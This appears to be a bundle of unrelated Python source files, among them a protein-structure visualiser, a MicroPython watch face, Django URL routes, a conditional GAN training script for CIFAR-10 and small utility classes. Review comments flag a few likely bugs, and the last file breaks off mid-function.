        urllib.request.urlretrieve(url, outfnm)
    except Exception:
        print("Error in downloading the file!")
###############################################################################
# creating a PeriodicTable() object to obtain atomic numbers from names of
# elements
table = mol.PeriodicTable()
###############################################################################
# Creating empty lists which will be filled with atomic information as we
# parse the pdb file.
NumberOfAtoms = 0        # running count of parsed (non-hydrogen) atoms
points = []              # xyz coordinate triple per atom
elements = []            # atomic number per atom
atom_names = []          # PDB atom-name column per atom
model = []               # model number per atom
sheets = []              # [start_chain, start_resi, end_chain, end_resi] per SHEET record
helix = []               # [start_chain, start_resi, end_chain, end_resi] per HELIX record
residue_seq = []         # residue sequence number per atom
chain = []               # chain identifier (as its ordinal) per atom
is_hetatm = []           # True for HETATM records, False for ATOM records
current_model_number = 1
###############################################################################
# Parsing the pdb file for information about coordinates and atoms
pdbfile = open(pdbfn, 'r')
pdb_lines = pdbfile.readlines()
# NOTE(review): PDB is a fixed-width format; whitespace-splitting each line
# and selecting fields by index works for well-formed files like 4kb2 but
# can mis-parse records with fused columns — confirm acceptable for a demo.
for line in pdb_lines:
    line = line.split()
    try:
        if line[0] == 'ATOM' or line[0] == 'HETATM':
            # Skip hydrogens (last split field is the element symbol).
            if line[-1] != 'H':
                coorX, coorY, coorZ = float(line[6]), float(line[7]), \
                    float(line[8])
                resi = line[5]
                current_chain = ord(line[4])
                points += [[coorX, coorY, coorZ]]
                residue_seq += [resi]
                chain += [current_chain]
                elements += [table.atomic_number(line[-1])]
                atom_names += [line[2]]
                model += [current_model_number]
                NumberOfAtoms += 1
                if(line[0] == 'HETATM'):
                    is_hetatm += [True]
                else:
                    is_hetatm += [False]
        # Secondary-structure records used later by the ribbon representation.
        if line[0] == 'SHEET':
            start_chain = ord(line[5])
            start_resi = int(line[6])
            end_chain = ord(line[8])
            end_resi = int(line[9])
            r = [start_chain, start_resi, end_chain, end_resi]
            sheets += [r]
        if line[0] == 'HELIX':
            start_chain = ord(line[4])
            start_resi = int(line[5])
            end_chain = ord(line[7])
            end_resi = int(line[8])
            r = [start_chain, start_resi, end_chain, end_resi]
            helix += [r]
    except Exception:
        # Best-effort parsing: skip blank/short/irrelevant records silently.
        continue
# Convert the accumulated per-atom lists into arrays for the Molecule object.
points = np.array(points)
residue_seq = np.array(residue_seq, dtype=int)
chain = np.array(chain)
elements = np.array(elements)
atom_names = np.array(atom_names)
model = np.array(model)
sheets = np.array(sheets)
helix = np.array(helix)
is_hetatm = np.array(is_hetatm)
###############################################################################
# Helper function to make the visuals look good by manipulating lighting.
def make_aesthetic(molecule_rep):
    """Tune lighting on a molecular representation for a nicer render."""
    # Apply each lighting property through the actor's VTK property object.
    for setter_name, value in (('SetAmbient', 0.2),
                               ('SetDiffuse', 1),
                               ('SetSpecular', 1),
                               ('SetSpecularPower', 100.0)):
        getattr(molecule_rep.GetProperty(), setter_name)(value)
###############################################################################
# Doing 3 things here -
# 1. Creating the molecule object.
# 2. Computing the bonding information for the molecule.
# 3. Generating and adding molecular representations to the scene.
molecule = mol.Molecule(elements, points, atom_names, model,
                        residue_seq, chain, sheets, helix, is_hetatm)
# print(np.unique(elements))
mol.compute_bonding(molecule)
# bounding box around the whole molecule
b_box = mol.bounding_box(molecule, colors=(0, 0.8, 1), linewidth=0.4)
# stick representation (bonds only)
stick_rep = mol.stick(molecule, bond_thickness=0.2)
make_aesthetic(stick_rep)
# ribbon representation (secondary structure)
ribbon_rep = mol.ribbon(molecule)
make_aesthetic(ribbon_rep)
# ball and stick representation
ball_stick_rep = mol.ball_stick(molecule, atom_scale_factor=0.3,
                                bond_thickness=0.2)
make_aesthetic(ball_stick_rep)
# space-filling (CPK / van der Waals sphere) representation
vdw_sphere_rep = mol.sphere_cpk(molecule)
make_aesthetic(vdw_sphere_rep)
###############################################################################
# We perform symmetric difference to determine the unchecked options.
# We also define methods to render visibility and color.
# Get difference between two lists.
def sym_diff(l1, l2):
    """Return the elements that appear in exactly one of *l1* and *l2*."""
    return list(set(l1) ^ set(l2))
# Checkbox callback: keep actor visibility in sync with the checked labels.
def set_figure_visiblity(checkboxes):
    """Show the checked representations and hide the unchecked ones."""
    checked = checkboxes.checked_labels
    unchecked = sym_diff(list(figure_dict), checked)
    # Process the checked labels (shown) first, then the unchecked (hidden).
    for label, shown in [(lbl, True) for lbl in checked] + \
                        [(lbl, False) for lbl in unchecked]:
        figure_dict[label].SetVisibility(shown)
        # The opacity slider only makes sense while the space-filling
        # (VdW sphere) representation is on screen.
        if 'Space filling' in label:
            vdw_opacity_line_slider.set_visibility(shown)
# Maps checkbox labels to their renderable representations.
figure_dict = {'Bounding box': b_box, 'Ribbon':ribbon_rep,
               'Stick': stick_rep, 'Ball and Stick':ball_stick_rep,
               'Space filling': vdw_sphere_rep}
all_labels = list(figure_dict)
# Start with only the first two (Bounding box, Ribbon) visible.
checked = all_labels[:2]
unchecked = all_labels[2:]
check_box = ui.Checkbox(all_labels, checked, padding=1, font_size=15,
                        font_family='Arial', position=(20, 30))
check_box.on_change = set_figure_visiblity
# Vertical slider controlling the opacity of the space-filling spheres.
vdw_opacity_line_slider = ui.LineSlider2D(initial_value=1, center=(550, 70),
                                          min_value=0, max_value=1,
                                          orientation="Vertical",
                                          text_alignment="Left", length=80,
                                          outer_radius=10, font_size=14,
                                          text_template="Opacity({ratio:.0%}) ")
def change_opacity(slider):
    # Slider callback: apply the chosen opacity to the VdW sphere actor.
    opacity = slider.value
    vdw_sphere_rep.GetProperty().SetOpacity(opacity)
    # NOTE(review): the loop below re-hides whatever was in the module-level
    # `unchecked` list captured at startup; it looks like a copy-paste
    # remnant of set_figure_visiblity and may fight the live checkbox
    # state — confirm whether it is intentional.
    for invisible in unchecked:
        figure_dict[invisible].SetVisibility(False)
        if 'Space filling' == invisible:
            vdw_opacity_line_slider.set_visibility(False)
vdw_opacity_line_slider.on_change = change_opacity
###############################################################################
# Dimensions of the output screen
screen_x_dim = 600
screen_y_dim = 600
dims = (screen_x_dim, screen_y_dim)
###############################################################################
# creating a ShowManager object
showm = window.ShowManager(size=dims, title=pdb_code)
# On-screen caption showing the PDB code near the bottom centre.
tb = ui.TextBlock2D(text=pdb_code.upper(), position=(screen_x_dim/2-40,
                    screen_y_dim/12), font_size=24, color=(1, 1, 1))
tb.actor.GetTextProperty().SetFontFamilyToCourier()
###############################################################################
# Adding the textblocks, axes and molecular representations to the scene.
showm.scene.reset_clipping_range()
showm.scene.add(tb)
showm.scene.add(actor.axes(scale=(5, 5, 5)))
showm.scene.add(stick_rep)
showm.scene.add(b_box)
showm.scene.add(ball_stick_rep)
showm.scene.add(ribbon_rep)
showm.scene.add(vdw_sphere_rep, vdw_opacity_line_slider)
showm.scene.add(check_box)
###############################################################################
# Delete the PDB file.
# NOTE(review): `flag = 0` unconditionally disables the deletion below, so a
# freshly downloaded PDB file is always kept on disk — confirm intentional.
flag = 0
if flag:
    os.remove(pdbfn)
# Open an interactive window; set to False for headless snapshot-only runs.
interactive = True
if interactive:
    showm.start()
###############################################################################
# to save a snapshot of the image
window.record(showm.scene, size=dims, out_path='images/4kb2_protein_viz.png')
|
'''
watch.py - Analog Watch Display
Video: https://youtu.be/NItKb6umMc4
'''
import utime
import math
from machine import Pin, SPI
import axp202c
import st7789
def main():
    '''
    Draw analog watch face and update time

    Runs forever: once per second it erases the previously drawn hand
    positions (by filling their bounding rectangles) and redraws the hour,
    minute and second hand polygons rotated to the current local time.
    '''
    try:
        # Turn power on display power
        axp = axp202c.PMU()
        axp.enablePower(axp202c.AXP202_LDO2)
        # initialize spi port
        spi = SPI(
            1,
            baudrate=32000000,
            sck=Pin(18, Pin.OUT),
            mosi=Pin(19, Pin.OUT))
        # configure display
        tft = st7789.ST7789(
            spi,
            240,
            240,
            cs=Pin(5, Pin.OUT),
            dc=Pin(27, Pin.OUT),
            backlight=Pin(12, Pin.OUT),
            rotation=2)
        # enable display
        tft.init()
        # draw the watch face background
        tft.jpg("face.jpg", 0, 0, st7789.SLOW)
        # define the polygons for the hour, minute and second hands
        # polygons must be closed convex polygons or bad things(tm) happen.
        second_poly = [
            (3, 1), (1, 3), (1, 72), (3, 75), (6, 72), (6, 3), (4, 1), (3, 1)]
        minute_poly = [
            (5, 1), (1, 8), (1, 72), (5, 75), (10, 72), (10, 8), (6, 1), (5, 1)]
        hour_poly = [
            (7, 1), (1, 8), (1, 62), (7, 65), (14, 62), (14, 8), (10, 1), (7, 1)]
        # constants for calculating hand angles.
        pi_div_6 = math.pi/6        # radians per hour on the dial
        pi_div_30 = math.pi/30      # radians per minute (or second) tick
        pi_div_360 = math.pi/360    # hour-hand advance per minute
        pi_div_1800 = math.pi/1800  # minute-hand advance per second
        pi_div_2160 = math.pi/2160  # hour-hand advance per second
        # initialize variables for the bounding rectangles for the
        # hour, minute and second hands. Calling bounding with True will
        # reset the bounds, calling with False will disable bounding
        tft.bounding(True)
        hour_bound = tft.bounding(True)
        minute_bound = tft.bounding(True)
        second_bound = tft.bounding(True)
        while True:
            # save the current time in seconds so we can determine when
            # when to update the display.
            last = utime.time()
            # get the current hour, minute and second
            _, _, _, hour, minute, second, _, _ = utime.localtime()
            # constrain hours to 12 hour time
            hour %= 12
            # calculate the angle of the hour hand in radians
            hour_ang = (
                (hour * pi_div_6) +
                (minute * pi_div_360) +
                (second * pi_div_2160))
            # calculate the angle of the minute hand in radians
            minute_ang = ((minute*pi_div_30)+(second*pi_div_1800))
            # calculate the angle of the second hand on radians
            second_ang = (second*pi_div_30)
            # erase the bounding area of the last drawn hour hand
            # NOTE(review): erasing with solid WHITE assumes the watch face
            # behind the hands is white — confirm against face.jpg.
            x1, y1, x2, y2 = hour_bound
            tft.fill_rect(x1, y1, x2-x1+1, y2-y1+1, st7789.WHITE)
            # erase the bounding area of the last drawn minute hand
            x1, y1, x2, y2 = minute_bound
            tft.fill_rect(x1, y1, x2-x1+1, y2-y1+1, st7789.WHITE)
            # erase the bounding area of the last drawn second hand
            x1, y1, x2, y2 = second_bound
            tft.fill_rect(x1, y1, x2-x1+1, y2-y1+1, st7789.WHITE)
            tft.bounding(True)  # clear bounding rectangle
            # draw and fill the hour hand polygon rotated to hour_ang
            tft.fill_polygon(
                hour_poly,
                112,  # 119-7 (half polygon_width)
                59,   # 119-60 (polygon_height - tail)
                st7789.BLACK,
                hour_ang,
                7,    # center of
                60)   # polygon rotaton
            # get the bounding rectangle of the hour_polygon as drawn and
            # reset the bounding box for the next polygon
            hour_bound = tft.bounding(True)
            # draw and fill the minute hand polygon rotated to minute_ang
            tft.fill_polygon(
                minute_poly,
                114,  # 119-5 (half polygon_width)
                49,   # 119-70 (polygon_height - tail)
                st7789.BLACK,
                minute_ang,
                5,    # center of
                70)   # polygon rotation
            # get the bounding rectangle of the minute_polygon as drawn and
            # reset the bounding box for the next polygon
            minute_bound = tft.bounding(True)
            # draw and fill the second hand polygon rotated to second_ang
            tft.fill_polygon(
                second_poly,
                116,  # 119-3 (half polygon_width)
                49,   # 119-70 (polygon_height - tail)
                st7789.RED,
                second_ang,
                3,    # center of
                70)   # polygon rotation
            # get the bounding rectangle of the second_polygon as drawn and
            # reset the bounding box for the next polygon
            second_bound = tft.bounding(True)
            # wait until the current second changes
            while last == utime.time():
                utime.sleep_ms(50)
    finally:
        # shutdown spi
        if 'spi' in locals():
            spi.deinit()
# Start the watch loop when the module is executed.
main()
|
from __future__ import (
annotations,
)
import pickle
from . import (
Path_,
)
from typing import (
Any,
Protocol,
NoReturn,
)
from . import (
Pkl,
)
class PklIF(Protocol):
    """Structural interface for objects that round-trip through pickle files.

    Implementers gain ``to_pickle`` for serialisation and ``from_pickle``
    for deserialisation, both delegating to the project's ``Pkl`` helper.
    """

    def to_pickle(self, path: Path_) -> None:
        """Serialise ``self`` to the pickle file at *path*.

        BUG FIX: the return annotation was ``NoReturn``, which declares a
        function that never returns normally (e.g. always raises).  This
        method returns normally with no value, so ``None`` is correct.
        """
        Pkl.dump(obj=self, path=path)

    @staticmethod
    def from_pickle(path: Path_) -> PklIF:
        """Load and return a previously pickled object from *path*."""
        return Pkl.load(path=path)
from django.urls import path
from .views import *
urlpatterns = [
    # List view for innovation challenges.
    path('desafioInovacao', DesafioInovacao.as_view(), name="desafioInovacao"),
    # Detail view for a single record.
    path('desafioInovacao/<int:pk>', DesafioInovacaoDetailView.as_view(),
         name='desafioInovacao-detail'),
    path('desafioInovacao/create/', DesafioInovacaoCreate.as_view(),
         name='desafioInovacao_create'),
    path('desafioInovacao/<int:pk>/update/',
         DesafioInovacaoUpdate.as_view(), name='desafioInovacao_update'),
    # BUG FIX: the delete URL was wired to the list view (DesafioInovacao),
    # so 'desafioInovacao_delete' never deleted anything.  Route it to the
    # delete view, matching the Create/Update naming convention.
    # TODO(review): confirm DesafioInovacaoDelete exists in .views.
    path('desafioInovacao/<int:pk>/delete/',
         DesafioInovacaoDelete.as_view(), name='desafioInovacao_delete'),
]
|
# -*- coding: utf-8 -*-
"""D_With_G
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1uqdOlUPpor_JN2EDdGx2V2KbXLqvCIEX
"""
import matplotlib
matplotlib.use('Agg')
import torch
import torch.nn as nn
import torch.utils.data as Data
import torchvision
import torchvision.transforms as transforms
import torch.optim as optim
import os
import numpy as np
from torch.autograd import Variable
import time
class discriminator(nn.Module):
    """Critic/classifier for 32x32 RGB images (ACGAN-style discriminator).

    ``forward`` returns a pair: a scalar Wasserstein critic score per sample
    (``fc1``) and 10-way class logits (``fc10``).
    """

    def __init__(self):
        super(discriminator, self).__init__()

        def block(stride, out_hw):
            # Conv(196->196, 3x3) -> LayerNorm -> LeakyReLU at the given
            # stride; out_hw is the spatial size after the convolution.
            return nn.Sequential(
                nn.Conv2d(196, 196, 3, stride, 1),
                nn.LayerNorm((196, out_hw, out_hw)),
                nn.LeakyReLU(),
            )

        # First block maps the 3-channel image to 196 feature maps at 32x32.
        self.conv1 = nn.Sequential(
            nn.Conv2d(3, 196, 3, 1, 1),
            nn.LayerNorm((196, 32, 32)),
            nn.LeakyReLU(),
        )
        self.conv2 = block(2, 16)
        self.conv3 = block(1, 16)
        self.conv4 = block(2, 8)
        self.conv5 = block(1, 8)
        self.conv6 = block(1, 8)
        self.conv7 = block(1, 8)
        self.conv8 = block(2, 4)
        self.pool = nn.MaxPool2d(4, 4)
        self.fc1 = nn.Sequential(nn.Linear(196, 1))
        self.fc10 = nn.Sequential(nn.Linear(196, 10))

    def forward(self, x):
        # Run the eight convolutional stages in order.
        for stage in (self.conv1, self.conv2, self.conv3, self.conv4,
                      self.conv5, self.conv6, self.conv7, self.conv8):
            x = stage(x)
        x = self.pool(x)
        # Flatten the 196x1x1 feature map into a 196-vector per sample.
        x = x.view(-1, 196)
        return self.fc1(x), self.fc10(x)
class generator(nn.Module):
    """Generator mapping 100-dim noise to a 32x32 RGB image in [-1, 1].

    The first ``n_classes`` dimensions of the noise carry a one-hot label
    in the surrounding training script, making the model conditional.
    """

    def __init__(self):
        super(generator, self).__init__()
        # Project the latent vector to a 196x4x4 feature volume.
        self.fc1 = nn.Sequential(nn.Linear(100, 196 * 4 * 4))

        def up(act):
            # Transposed conv doubling the spatial size (196 -> 196 maps).
            return nn.Sequential(
                nn.ConvTranspose2d(196, 196, 4, 2, 1),
                nn.BatchNorm2d(196),
                act(),
            )

        def same(act):
            # 3x3 conv preserving the spatial size (196 -> 196 maps).
            return nn.Sequential(
                nn.Conv2d(196, 196, 3, 1, 1),
                nn.BatchNorm2d(196),
                act(),
            )

        self.conv1 = up(nn.ReLU)          # 4x4  -> 8x8
        self.conv2 = same(nn.ReLU)
        self.conv3 = same(nn.LeakyReLU)
        self.conv4 = same(nn.LeakyReLU)
        self.conv5 = up(nn.ReLU)          # 8x8  -> 16x16
        self.conv6 = same(nn.ReLU)
        self.conv7 = up(nn.ReLU)          # 16x16 -> 32x32
        # Final projection to 3 channels, squashed to [-1, 1].
        self.conv8 = nn.Sequential(
            nn.Conv2d(196, 3, 3, 1, 1),
            nn.Tanh(),
        )

    def forward(self, x):
        x = self.fc1(x)
        # Reshape the flat projection into 4x4 feature maps.
        x = x.view(x.size(0), 196, 4, 4)
        for stage in (self.conv1, self.conv2, self.conv3, self.conv4,
                      self.conv5, self.conv6, self.conv7, self.conv8):
            x = stage(x)
        return x
import numpy as np
import torch
import torchvision
import os
import torchvision.transforms as transforms
import matplotlib.pyplot as plt
import matplotlib as mpl
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
import torch.autograd as autograd
# import data and data augmentation
# Training-time augmentation: random crop/flip plus slight colour jitter,
# then per-channel normalisation of RGB to the [-1, 1] range matching the
# generator's Tanh output.
transform_train = transforms.Compose([
    transforms.RandomResizedCrop(32, scale=(0.7, 1.0), ratio=(1.0,1.0)),
    # NOTE(review): torch.randn(1) can be negative, and torchvision's
    # ColorJitter rejects negative single-number factors (and hue outside
    # [0, 0.5]) — these lines can raise ValueError at import time roughly
    # half the time.  Confirm the intended jitter magnitudes.
    transforms.ColorJitter(
        brightness=0.1*torch.randn(1),
        contrast=0.1*torch.randn(1),
        saturation=0.1*torch.randn(1),
        hue=0.1*torch.randn(1)),
    transforms.RandomHorizontalFlip(),
    transforms.ToTensor(),
    transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
# Evaluation pipeline: deterministic crop and the same normalisation.
transform_test = transforms.Compose([
    transforms.CenterCrop(32),
    transforms.ToTensor(),
    transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5)),
])
# Batch size is also read by calc_gradient_penalty below.
batch_size = 128
# Downloads CIFAR-10 into the working directory on first run.
trainset = torchvision.datasets.CIFAR10(root='./', train=True, download=True, transform=transform_train)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=8)
testset = torchvision.datasets.CIFAR10(root='./', train=False, download=False, transform=transform_test)
testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=8)
def calc_gradient_penalty(netD, real_data, fake_data):
    """WGAN-GP gradient penalty on real/fake interpolations.

    Evaluates the critic at random points on the line segments between
    real and fake samples and penalises the squared deviation of the
    gradient norm from 1 (encouraging an approximately 1-Lipschitz critic).

    NOTE: relies on the module-level ``batch_size`` global and on CUDA
    being available; ``real_data``/``fake_data`` must hold ``batch_size``
    CIFAR-sized samples.
    Returns a scalar tensor (the penalty term, already scaled by LAMBDA).
    """
    DIM = 32      # spatial size of CIFAR-10 images
    LAMBDA = 10   # penalty coefficient from the WGAN-GP paper
    # One mixing coefficient per sample, broadcast over channels/pixels.
    alpha = torch.rand(batch_size, 1)
    alpha = alpha.expand(batch_size, int(real_data.nelement()/batch_size)).contiguous()
    alpha = alpha.view(batch_size, 3, DIM, DIM)
    alpha = alpha.cuda()
    fake_data = fake_data.view(batch_size, 3, DIM, DIM)
    # Random point between each real/fake pair; detach so the penalty does
    # not back-propagate into the generator.
    interpolates = alpha * real_data.detach() + ((1 - alpha) * fake_data.detach())
    interpolates = interpolates.cuda()
    interpolates.requires_grad_(True)
    # Only the critic score is penalised; the aux class logits are ignored.
    disc_interpolates, _ = netD(interpolates)
    # create_graph=True so the penalty itself is differentiable w.r.t. netD.
    gradients = autograd.grad(outputs=disc_interpolates, inputs=interpolates,
                              grad_outputs=torch.ones(disc_interpolates.size()).cuda(),
                              create_graph=True, retain_graph=True, only_inputs=True)[0]
    gradients = gradients.view(gradients.size(0), -1)
    # Two-sided penalty: (||grad||_2 - 1)^2, averaged over the batch.
    gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() * LAMBDA
    return gradient_penalty
#import matplotlib
#matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
import os
import time
def plot(samples):
    """Lay out up to 100 sample images on a tight 10x10 grid.

    Returns the matplotlib figure so the caller can save and close it.
    """
    fig = plt.figure(figsize=(10, 10))
    grid = gridspec.GridSpec(10, 10)
    grid.update(wspace=0.02, hspace=0.02)
    for idx, image in enumerate(samples):
        axis = plt.subplot(grid[idx])
        # Strip all ticks/labels so only the images are visible.
        plt.axis('off')
        axis.set_xticklabels([])
        axis.set_yticklabels([])
        axis.set_aspect('equal')
        plt.imshow(image)
    return fig
# Resume both networks from whole-model pickle checkpoints.
# NOTE(review): torch.load of a full model requires the discriminator /
# generator classes above to be importable, and unpickling is unsafe on
# untrusted files.
aD = torch.load('tempD.model')
#aD = discriminator()
aD.cuda()
aG = torch.load('tempG.model')
#aG = generator()
aG.cuda()
# Adam with betas=(0, 0.9) — the setting recommended for WGAN-GP training.
optimizer_g = torch.optim.Adam(aG.parameters(), lr=0.0001, betas=(0,0.9))
optimizer_d = torch.optim.Adam(aD.parameters(), lr=0.0001, betas=(0,0.9))
# Cross-entropy over the auxiliary 10-way class head.
criterion = nn.CrossEntropyLoss()
n_z = 100        # latent dimension
n_classes = 10   # CIFAR-10 classes
# Fixed conditional noise grid (10 samples per class) used to render
# progress snapshots every epoch; seeded for reproducibility.
np.random.seed(352)
label = np.asarray(list(range(10))*10)
noise = np.random.normal(0,1,(100,n_z))
label_onehot = np.zeros((100,n_classes))
label_onehot[np.arange(100), label] = 1
# Embed the one-hot label into the first n_classes noise dimensions.
noise[np.arange(100), :n_classes] = label_onehot[np.arange(100)]
noise = noise.astype(np.float32)
save_noise = torch.from_numpy(noise)
save_noise = Variable(save_noise).cuda()
start_time = time.time()
# Train the model
num_epochs = 200
# Resumes at epoch 111 to continue from the loaded checkpoints.
for epoch in range(111,num_epochs):
    # Clamp Adam's internal step counters for both optimizers.
    # NOTE(review): presumably a workaround for a numerical issue in Adam's
    # bias correction (beta**step underflow) on older PyTorch — confirm.
    if (epoch > 6):
        for group in optimizer_g.param_groups:
            for p in group['params']:
                state = optimizer_g.state[p]
                if 'step' in state.keys():
                    if(state['step']>=1024):
                        state['step'] = 1000
    if (epoch > 6):
        for group in optimizer_d.param_groups:
            for p in group['params']:
                state = optimizer_d.state[p]
                if 'step' in state.keys():
                    if(state['step']>=1024):
                        state['step'] = 1000
    aG.train()
    aD.train()
    # Per-epoch running statistics (printed every 50 batches).
    loss1 = []
    loss2 = []
    loss3 = []
    loss4 = []
    loss5 = []
    acc1 = []
    for batch_idx, (X_train_batch, Y_train_batch) in enumerate(trainloader):
        # Skip the final short batch; the gradient penalty and accuracy
        # computations assume exactly batch_size samples.
        if(Y_train_batch.shape[0] < batch_size):
            continue
        # train G
        gen_train = 1
        if((batch_idx%gen_train)==0):
            # Freeze the critic while updating the generator.
            for p in aD.parameters():
                p.requires_grad_(False)
            aG.zero_grad()
            # Conditional noise: first n_classes dims carry a one-hot label.
            label = np.random.randint(0,n_classes,batch_size)
            noise = np.random.normal(0,1,(batch_size,n_z))
            label_onehot = np.zeros((batch_size,n_classes))
            label_onehot[np.arange(batch_size), label] = 1
            noise[np.arange(batch_size), :n_classes] = label_onehot[np.arange(batch_size)]
            noise = noise.astype(np.float32)
            noise = torch.from_numpy(noise)
            noise = Variable(noise).cuda()
            fake_label = Variable(torch.from_numpy(label)).cuda()
            fake_data = aG(noise)
            gen_source, gen_class = aD(fake_data)
            gen_source = gen_source.mean()
            gen_class = criterion(gen_class, fake_label)
            # ACGAN-style generator loss: raise the critic score while
            # making samples classifiable as their intended class.
            gen_cost = -gen_source + gen_class
            gen_cost.backward()
            optimizer_g.step()
        # train D
        for p in aD.parameters():
            p.requires_grad_(True)
        aD.zero_grad()
        # train discriminator with input from generator
        label = np.random.randint(0,n_classes,batch_size)
        noise = np.random.normal(0,1,(batch_size,n_z))
        label_onehot = np.zeros((batch_size,n_classes))
        label_onehot[np.arange(batch_size), label] = 1
        noise[np.arange(batch_size), :n_classes] = label_onehot[np.arange(batch_size)]
        noise = noise.astype(np.float32)
        noise = torch.from_numpy(noise)
        noise = Variable(noise).cuda()
        fake_label = Variable(torch.from_numpy(label)).cuda()
        # No generator gradients are needed for the critic update.
        with torch.no_grad():
            fake_data = aG(noise)
        disc_fake_source, disc_fake_class = aD(fake_data)
        disc_fake_source = disc_fake_source.mean()
        disc_fake_class = criterion(disc_fake_class, fake_label)
        # train discriminator with input from the discriminator
        real_data = Variable(X_train_batch).cuda()
        real_label = Variable(Y_train_batch).cuda()
        disc_real_source, disc_real_class = aD(real_data)
        prediction = disc_real_class.data.max(1)[1]
        accuracy = ( float( prediction.eq(real_label.data).sum() ) /float(batch_size))*100.0
        disc_real_source = disc_real_source.mean()
        disc_real_class = criterion(disc_real_class, real_label)
        # WGAN-GP penalty keeps the critic approximately 1-Lipschitz.
        gradient_penalty = calc_gradient_penalty(aD,real_data,fake_data)
        disc_cost = disc_fake_source - disc_real_source + disc_real_class + disc_fake_class + gradient_penalty
        disc_cost.backward()
        optimizer_d.step()
        loss1.append(gradient_penalty.item())
        loss2.append(disc_fake_source.item())
        loss3.append(disc_real_source.item())
        loss4.append(disc_real_class.item())
        loss5.append(disc_fake_class.item())
        acc1.append(accuracy)
        if((batch_idx%50)==0):
            print('epoch:', epoch, ' ', 'batch_idx:', batch_idx, ' ', 'loss1',"%.2f" % np.mean(loss1),
                  'loss2',"%.2f" % np.mean(loss2),
                  'loss3',"%.2f" % np.mean(loss3),
                  'loss4',"%.2f" % np.mean(loss4),
                  'loss5',"%.2f" % np.mean(loss5),
                  'acc1',"%.2f" % np.mean(acc1))
    # Test the model
    aD.eval()
    with torch.no_grad():
        test_accu = []
        for batch_idx, (X_test_batch, Y_test_batch) in enumerate(testloader):
            X_test_batch, Y_test_batch= Variable(X_test_batch).cuda(),Variable(Y_test_batch).cuda()
            with torch.no_grad():
                _, output = aD(X_test_batch)
            prediction = output.data.max(1)[1] # first column has actual prob.
            # NOTE(review): divides by batch_size even for the final short
            # test batch, slightly underestimating accuracy.
            accuracy = ( float( prediction.eq(Y_test_batch.data).sum() ) /float(batch_size))*100.0
            test_accu.append(accuracy)
        accuracy_test = np.mean(test_accu)
    print('Testing',accuracy_test, time.time()-start_time)
    ### save output
    # Render the fixed conditional noise grid to track generator progress;
    # rescale Tanh output from [-1, 1] to [0, 1] and move channels last.
    # NOTE(review): requires an existing 'output/' directory.
    with torch.no_grad():
        aG.eval()
        samples = aG(save_noise)
        samples = samples.data.cpu().numpy()
        samples += 1.0
        samples /= 2.0
        samples = samples.transpose(0,2,3,1)
        aG.train()
    fig = plot(samples)
    plt.savefig('output/%s.png' % str(epoch).zfill(3), bbox_inches='tight')
    plt.close(fig)
    # Checkpoint every epoch (the %1 condition is always true).
    if(((epoch+1)%1)==0):
        torch.save(aG,'tempG.model')
        torch.save(aD,'tempD.model')
torch.save(aG,'generator.model')
torch.save(aD,'discriminator.model')
|
def iter_fact(n):
    '''
    Return n! computed iteratively.

    Assumes n is an int >= 0 (the original contract said > 0, but n == 0
    correctly yields 1 here as well, matching the previous behaviour).
    Uses a for/range loop instead of manually decrementing the argument,
    which also leaves the caller's value of n conceptually untouched.
    '''
    result = 1
    for factor in range(2, n + 1):
        result *= factor
    return result


iter_fact(5)
|
#!/usr/bin/env python
""" Class representing a AI Model.
Represents a AI Model. AI Models are used by AI Agents to process
incoming data.
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files(the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Contributors:
"""
from modules.AbstractModel import AbstractModel
class model(AbstractModel):
    """ Class representing an AI Model.

    This object represents an AI Model. AI Models are used by AI Agents
    to process incoming data.

    NOTE(review): every method below is an unimplemented stub; the class
    name is lowercase, presumably because a framework loads it by this
    exact name — confirm before renaming.
    """

    def prepare_data(self):
        """ Creates/sorts dataset. """
        pass

    def prepare_network(self):
        """ Builds the network. """
        pass

    def train(self):
        """ Trains the model

        Trains the neural network.
        """
        pass

    def freeze_model(self):
        """ Freezes the model """
        pass

    def save_model_as_json(self):
        """ Saves the model as JSON """
        pass

    def save_weights(self):
        """ Saves the model weights """
        pass

    def visualize_metrics(self):
        """ Visualize the metrics. """
        pass

    def confusion_matrix(self):
        """ Prints/displays the confusion matrix. """
        pass

    def figures_of_merit(self):
        """ Calculates/prints the figures of merit.

        https://homes.di.unimi.it/scotti/all/
        """
        pass

    def load(self):
        """ Loads the model """
        pass

    def evaluate(self):
        """ Evaluates the model """
        pass

    def predictions(self):
        """ Gets a prediction for an image. """
        pass

    # NOTE(review): predict/predictions have near-duplicate docstrings;
    # clarify the intended difference when implementing.
    def predict(self, img):
        """ Gets a prediction for an image. """
        pass

    def reshape(self, img):
        """ Reshapes an image. """
        pass

    def test(self):
        """ Test mode

        Loops through the test directory and classifies the images.
        """
        pass
|
import logging
from cliff import lister
import pkg_resources
LOG = logging.getLogger(__name__)
class GroupList(lister.Lister):
    """Shows the groups for which plugins are available.
    """

    def take_action(self, parsed_args):
        # Collect entry-point group names across every installed distribution.
        names = set()
        for dist in pkg_resources.working_set:
            LOG.debug('checking distribution "%s"', dist)
            names.update(pkg_resources.get_entry_map(dist).keys())
        columns = ('Name',)
